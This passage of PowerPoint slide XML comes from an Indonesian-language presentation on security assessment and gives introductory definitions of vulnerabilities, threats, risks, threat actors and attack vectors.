              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelanggaran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memahami</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pola</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pergerakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>merencanakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> strategi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>evakuasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>darurat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>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169</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2389986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Kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Risiko</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Tim </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengidentifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cara-cara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di mana </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diserang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Penilaian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melibatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>risiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kelemahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dipicu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sengaja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dieksploitasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sengaja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyebabkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelanggaran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Contoh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>termasuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keras</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikonfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diinstal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>benar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penundaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menerapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menguji</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> patch </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan firmware, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>arsitektur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dirancang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>buruk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fisik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memadai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penggunaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kata </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sandi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kelemahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>desain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>operasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Faktor-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>faktor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>nilai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rentan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kemudahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengeksploitasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kesalahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menentukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tingkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keparahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>potensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seseorang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sesuatu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengeksploitasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melanggar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>motivasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disengaja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disengaja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disengaja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Orang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sesuatu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menimbulkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aktor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>agen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Jalur </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aktor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jahat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>vektor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
